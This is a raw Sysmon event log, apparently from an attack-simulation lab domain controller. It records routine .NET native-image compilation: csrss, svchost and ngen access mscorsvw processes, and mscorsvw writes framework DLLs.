13:51:08.570{59A5CD1D-8E44-6005-0500-00000000A301}6401180C:\Windows\system32\csrss.exe{59A5CD1D-924C-6005-5804-00000000A301}2872C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvw.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\system32\basesrv.DLL+2f47|C:\Windows\SYSTEM32\CSRSRV.dll+5645|C:\Windows\SYSTEM32\ntdll.dll+5179f 10341000x80000000000000008619Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:51:08.570{59A5CD1D-90A3-6005-3001-00000000A301}41444264C:\Windows\Microsoft.NET\Framework\v4.0.30319\ngen.exe{59A5CD1D-924C-6005-5804-00000000A301}2872C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvw.exe0x103801C:\Windows\SYSTEM32\ntdll.dll+a6d64|C:\Windows\System32\wow64.dll+10c0b|C:\Windows\System32\wow64.dll+10499|C:\Windows\System32\wow64.dll+6e75|C:\Windows\System32\wow64cpu.dll+1d07|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+cba0|C:\Windows\SYSTEM32\ntdll.dll+77e0d|C:\Windows\SYSTEM32\ntdll.dll+77cae|C:\Windows\SYSTEM32\ntdll.dll+6f85c(wow64)|C:\Windows\System32\KERNELBASE.dll+d90a8(wow64)|C:\Windows\System32\KERNELBASE.dll+d7d7c(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+b37e(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+73b7(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+a4c6(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+a642(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+ad30(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+ae03(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+c43d(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+c4ad(wow64)|C:\Windows\System32\KERNEL32.DLL+162c4(wow64)|C:\Windows\SYSTEM32\ntdll.dll+60779(wow64)|C:\Windows\SYSTEM32\ntdll.dll+60744(wow64) 10341000x80000000000000008618Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:51:08.538{59A5CD1D-8E46-6005-0C00-00000000A301}5961056C:\Windows\system32\svchost.exe{59A5CD1D-924C-6005-5704-00000000A301}3048C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvw.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|c:\windows\system32\rpcss.dll+5296|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+2d5ab|C:\Windows\System32\RPCRT4.dll+620fa|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000008617Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:51:08.523{59A5CD1D-8E44-6005-0500-00000000A301}640756C:\Windows\system32\csrss.exe{59A5CD1D-924C-6005-5704-00000000A301}3048C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvw.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\system32\basesrv.DLL+2f47|C:\Windows\SYSTEM32\CSRSRV.dll+5645|C:\Windows\SYSTEM32\ntdll.dll+5179f 10341000x80000000000000008616Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:51:08.523{59A5CD1D-90A3-6005-3001-00000000A301}41442936C:\Windows\Microsoft.NET\Framework\v4.0.30319\ngen.exe{59A5CD1D-924C-6005-5704-00000000A301}3048C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvw.exe0x103801C:\Windows\SYSTEM32\ntdll.dll+a6d64|C:\Windows\System32\wow64.dll+10c0b|C:\Windows\System32\wow64.dll+10499|C:\Windows\System32\wow64.dll+6e75|C:\Windows\System32\wow64cpu.dll+1d07|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+cba0|C:\Windows\SYSTEM32\ntdll.dll+927a7|C:\Windows\SYSTEM32\ntdll.dll+c6c62|C:\Windows\SYSTEM32\ntdll.dll+77cae|C:\Windows\SYSTEM32\ntdll.dll+6f85c(wow64)|C:\Windows\System32\KERNELBASE.dll+d90a8(wow64)|C:\Windows\System32\KERNELBASE.dll+d7d7c(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+b37e(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+73b7(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+a4c6(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+a642(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+ad30(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+abce(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+af4a(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+b1b4(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+8f0a(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+8fe3(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+9082(wow64) 11241100x80000000000000008615Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.localDLL2021-01-18 13:51:08.460{59A5CD1D-924C-6005-5604-00000000A301}2956C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvw.exeC:\Windows\assembly\NativeImages_v4.0.30319_32\Temp\b8c-0\System.Reflection.Context.dll2021-01-18 13:51:08.460 10341000x80000000000000008614Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:51:08.351{59A5CD1D-8E46-6005-0C00-00000000A301}5961056C:\Windows\system32\svchost.exe{59A5CD1D-924C-6005-5604-00000000A301}2956C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvw.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|c:\windows\system32\rpcss.dll+5296|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+2d5ab|C:\Windows\System32\RPCRT4.dll+620fa|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000008613Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:51:08.335{59A5CD1D-8E44-6005-0500-00000000A301}640656C:\Windows\system32\csrss.exe{59A5CD1D-924C-6005-5604-00000000A301}2956C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvw.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\system32\basesrv.DLL+2f47|C:\Windows\SYSTEM32\CSRSRV.dll+5645|C:\Windows\SYSTEM32\ntdll.dll+5179f 10341000x80000000000000008612Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:51:08.335{59A5CD1D-90A3-6005-3001-00000000A301}41444264C:\Windows\Microsoft.NET\Framework\v4.0.30319\ngen.exe{59A5CD1D-924C-6005-5604-00000000A301}2956C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvw.exe0x103801C:\Windows\SYSTEM32\ntdll.dll+a6d64|C:\Windows\System32\wow64.dll+10c0b|C:\Windows\System32\wow64.dll+10499|C:\Windows\System32\wow64.dll+6e75|C:\Windows\System32\wow64cpu.dll+1d07|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+cba0|C:\Windows\SYSTEM32\ntdll.dll+77e0d|C:\Windows\SYSTEM32\ntdll.dll+77cae|C:\Windows\SYSTEM32\ntdll.dll+6f85c(wow64)|C:\Windows\System32\KERNELBASE.dll+d90a8(wow64)|C:\Windows\System32\KERNELBASE.dll+d7d7c(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+b37e(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+73b7(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+a4c6(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+a642(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+ad30(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+ae03(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+c43d(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+c4ad(wow64)|C:\Windows\System32\KERNEL32.DLL+162c4(wow64)|C:\Windows\SYSTEM32\ntdll.dll+60779(wow64)|C:\Windows\SYSTEM32\ntdll.dll+60744(wow64) 10341000x80000000000000008611Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:51:08.304{59A5CD1D-8E46-6005-0C00-00000000A301}5961056C:\Windows\system32\svchost.exe{59A5CD1D-924C-6005-5504-00000000A301}4596C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvw.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|c:\windows\system32\rpcss.dll+5296|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+2d5ab|C:\Windows\System32\RPCRT4.dll+620fa|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000008610Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:51:08.288{59A5CD1D-8E44-6005-0500-00000000A301}640756C:\Windows\system32\csrss.exe{59A5CD1D-924C-6005-5504-00000000A301}4596C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvw.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\system32\basesrv.DLL+2f47|C:\Windows\SYSTEM32\CSRSRV.dll+5645|C:\Windows\SYSTEM32\ntdll.dll+5179f 10341000x80000000000000008609Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:51:08.288{59A5CD1D-90A3-6005-3001-00000000A301}41442936C:\Windows\Microsoft.NET\Framework\v4.0.30319\ngen.exe{59A5CD1D-924C-6005-5504-00000000A301}4596C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvw.exe0x103801C:\Windows\SYSTEM32\ntdll.dll+a6d64|C:\Windows\System32\wow64.dll+10c0b|C:\Windows\System32\wow64.dll+10499|C:\Windows\System32\wow64.dll+6e75|C:\Windows\System32\wow64cpu.dll+1d07|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+cba0|C:\Windows\SYSTEM32\ntdll.dll+927a7|C:\Windows\SYSTEM32\ntdll.dll+c6c62|C:\Windows\SYSTEM32\ntdll.dll+77cae|C:\Windows\SYSTEM32\ntdll.dll+6f85c(wow64)|C:\Windows\System32\KERNELBASE.dll+d90a8(wow64)|C:\Windows\System32\KERNELBASE.dll+d7d7c(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+b37e(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+73b7(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+a4c6(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+a642(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+ad30(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+abce(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+af4a(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+b1b4(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+8f0a(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+8fe3(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+9082(wow64) 11241100x80000000000000008608Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.localDLL2021-01-18 13:51:08.210{59A5CD1D-924B-6005-5404-00000000A301}3256C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvw.exeC:\Windows\assembly\NativeImages_v4.0.30319_32\Temp\cb8-0\System.Printing.dll2021-01-18 13:51:08.210 10341000x80000000000000008646Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:51:09.960{59A5CD1D-8E46-6005-0C00-00000000A301}5961056C:\Windows\system32\svchost.exe{59A5CD1D-924D-6005-5F04-00000000A301}4684C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvw.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|c:\windows\system32\rpcss.dll+5296|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+2d5ab|C:\Windows\System32\RPCRT4.dll+620fa|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000008645Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:51:09.945{59A5CD1D-8E44-6005-0500-00000000A301}640656C:\Windows\system32\csrss.exe{59A5CD1D-924D-6005-5F04-00000000A301}4684C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvw.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\system32\basesrv.DLL+2f47|C:\Windows\SYSTEM32\CSRSRV.dll+5645|C:\Windows\SYSTEM32\ntdll.dll+5179f 10341000x80000000000000008644Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:51:09.945{59A5CD1D-90A3-6005-3001-00000000A301}41442936C:\Windows\Microsoft.NET\Framework\v4.0.30319\ngen.exe{59A5CD1D-924D-6005-5F04-00000000A301}4684C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvw.exe0x103801C:\Windows\SYSTEM32\ntdll.dll+a6d64|C:\Windows\System32\wow64.dll+10c0b|C:\Windows\System32\wow64.dll+10499|C:\Windows\System32\wow64.dll+6e75|C:\Windows\System32\wow64cpu.dll+1d07|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+cba0|C:\Windows\SYSTEM32\ntdll.dll+927a7|C:\Windows\SYSTEM32\ntdll.dll+c6c62|C:\Windows\SYSTEM32\ntdll.dll+77cae|C:\Windows\SYSTEM32\ntdll.dll+6f85c(wow64)|C:\Windows\System32\KERNELBASE.dll+d90a8(wow64)|C:\Windows\System32\KERNELBASE.dll+d7d7c(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+b37e(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+73b7(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+a4c6(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+a642(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+ad30(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+abce(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+af4a(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+b1b4(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+8f0a(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+8fe3(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+9082(wow64) 11241100x80000000000000008643Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.localDLL2021-01-18 13:51:09.882{59A5CD1D-924D-6005-5E04-00000000A301}4920C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvw.exeC:\Windows\assembly\NativeImages_v4.0.30319_32\Temp\1338-0\System.Security.dll2021-01-18 13:51:09.882 10341000x80000000000000008642Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:51:09.523{59A5CD1D-8E46-6005-0C00-00000000A301}5961056C:\Windows\system32\svchost.exe{59A5CD1D-924D-6005-5E04-00000000A301}4920C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvw.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|c:\windows\system32\rpcss.dll+5296|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+2d5ab|C:\Windows\System32\RPCRT4.dll+620fa|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000008641Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:51:09.507{59A5CD1D-8E44-6005-0500-00000000A301}640656C:\Windows\system32\csrss.exe{59A5CD1D-924D-6005-5E04-00000000A301}4920C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvw.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\system32\basesrv.DLL+2f47|C:\Windows\SYSTEM32\CSRSRV.dll+5645|C:\Windows\SYSTEM32\ntdll.dll+5179f 10341000x80000000000000008640Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:51:09.507{59A5CD1D-90A3-6005-3001-00000000A301}41444264C:\Windows\Microsoft.NET\Framework\v4.0.30319\ngen.exe{59A5CD1D-924D-6005-5E04-00000000A301}4920C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvw.exe0x103801C:\Windows\SYSTEM32\ntdll.dll+a6d64|C:\Windows\System32\wow64.dll+10c0b|C:\Windows\System32\wow64.dll+10499|C:\Windows\System32\wow64.dll+6e75|C:\Windows\System32\wow64cpu.dll+1d07|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+cba0|C:\Windows\SYSTEM32\ntdll.dll+77e0d|C:\Windows\SYSTEM32\ntdll.dll+77cae|C:\Windows\SYSTEM32\ntdll.dll+6f85c(wow64)|C:\Windows\System32\KERNELBASE.dll+d90a8(wow64)|C:\Windows\System32\KERNELBASE.dll+d7d7c(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+b37e(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+73b7(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+a4c6(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+a642(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+ad30(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+ae03(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+c43d(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+c4ad(wow64)|C:\Windows\System32\KERNEL32.DLL+162c4(wow64)|C:\Windows\SYSTEM32\ntdll.dll+60779(wow64)|C:\Windows\SYSTEM32\ntdll.dll+60744(wow64) 10341000x80000000000000008639Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:51:09.460{59A5CD1D-8E46-6005-0C00-00000000A301}5961056C:\Windows\system32\svchost.exe{59A5CD1D-924D-6005-5D04-00000000A301}4820C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvw.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|c:\windows\system32\rpcss.dll+5296|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+2d5ab|C:\Windows\System32\RPCRT4.dll+620fa|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000008638Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:51:09.460{59A5CD1D-8E44-6005-0500-00000000A301}640756C:\Windows\system32\csrss.exe{59A5CD1D-924D-6005-5D04-00000000A301}4820C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvw.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\system32\basesrv.DLL+2f47|C:\Windows\SYSTEM32\CSRSRV.dll+5645|C:\Windows\SYSTEM32\ntdll.dll+5179f 10341000x80000000000000008637Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:51:09.460{59A5CD1D-90A3-6005-3001-00000000A301}41442936C:\Windows\Microsoft.NET\Framework\v4.0.30319\ngen.exe{59A5CD1D-924D-6005-5D04-00000000A301}4820C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvw.exe0x103801C:\Windows\SYSTEM32\ntdll.dll+a6d64|C:\Windows\System32\wow64.dll+10c0b|C:\Windows\System32\wow64.dll+10499|C:\Windows\System32\wow64.dll+6e75|C:\Windows\System32\wow64cpu.dll+1d07|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+cba0|C:\Windows\SYSTEM32\ntdll.dll+927a7|C:\Windows\SYSTEM32\ntdll.dll+c6c62|C:\Windows\SYSTEM32\ntdll.dll+77cae|C:\Windows\SYSTEM32\ntdll.dll+6f85c(wow64)|C:\Windows\System32\KERNELBASE.dll+d90a8(wow64)|C:\Windows\System32\KERNELBASE.dll+d7d7c(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+b37e(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+73b7(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+a4c6(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+a642(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+ad30(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+abce(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+af4a(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+b1b4(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+8f0a(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+8fe3(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+9082(wow64) 11241100x80000000000000008636Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.localDLL2021-01-18 13:51:09.398{59A5CD1D-924D-6005-5C04-00000000A301}1584C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvw.exeC:\Windows\assembly\NativeImages_v4.0.30319_32\Temp\630-0\System.Runtime.Serialization.Formatters.Soap.dll2021-01-18 13:51:09.398 10341000x80000000000000008635Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:51:09.241{59A5CD1D-8E46-6005-0C00-00000000A301}5961056C:\Windows\system32\svchost.exe{59A5CD1D-924D-6005-5C04-00000000A301}1584C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvw.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|c:\windows\system32\rpcss.dll+5296|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+2d5ab|C:\Windows\System32\RPCRT4.dll+620fa|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000008634Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:51:09.226{59A5CD1D-8E44-6005-0500-00000000A301}640656C:\Windows\system32\csrss.exe{59A5CD1D-924D-6005-5C04-00000000A301}1584C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvw.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\system32\basesrv.DLL+2f47|C:\Windows\SYSTEM32\CSRSRV.dll+5645|C:\Windows\SYSTEM32\ntdll.dll+5179f 10341000x80000000000000008633Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:51:09.226{59A5CD1D-90A3-6005-3001-00000000A301}41444264C:\Windows\Microsoft.NET\Framework\v4.0.30319\ngen.exe{59A5CD1D-924D-6005-5C04-00000000A301}1584C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvw.exe0x103801C:\Windows\SYSTEM32\ntdll.dll+a6d64|C:\Windows\System32\wow64.dll+10c0b|C:\Windows\System32\wow64.dll+10499|C:\Windows\System32\wow64.dll+6e75|C:\Windows\System32\wow64cpu.dll+1d07|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+cba0|C:\Windows\SYSTEM32\ntdll.dll+77e0d|C:\Windows\SYSTEM32\ntdll.dll+77cae|C:\Windows\SYSTEM32\ntdll.dll+6f85c(wow64)|C:\Windows\System32\KERNELBASE.dll+d90a8(wow64)|C:\Windows\System32\KERNELBASE.dll+d7d7c(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+b37e(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+73b7(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30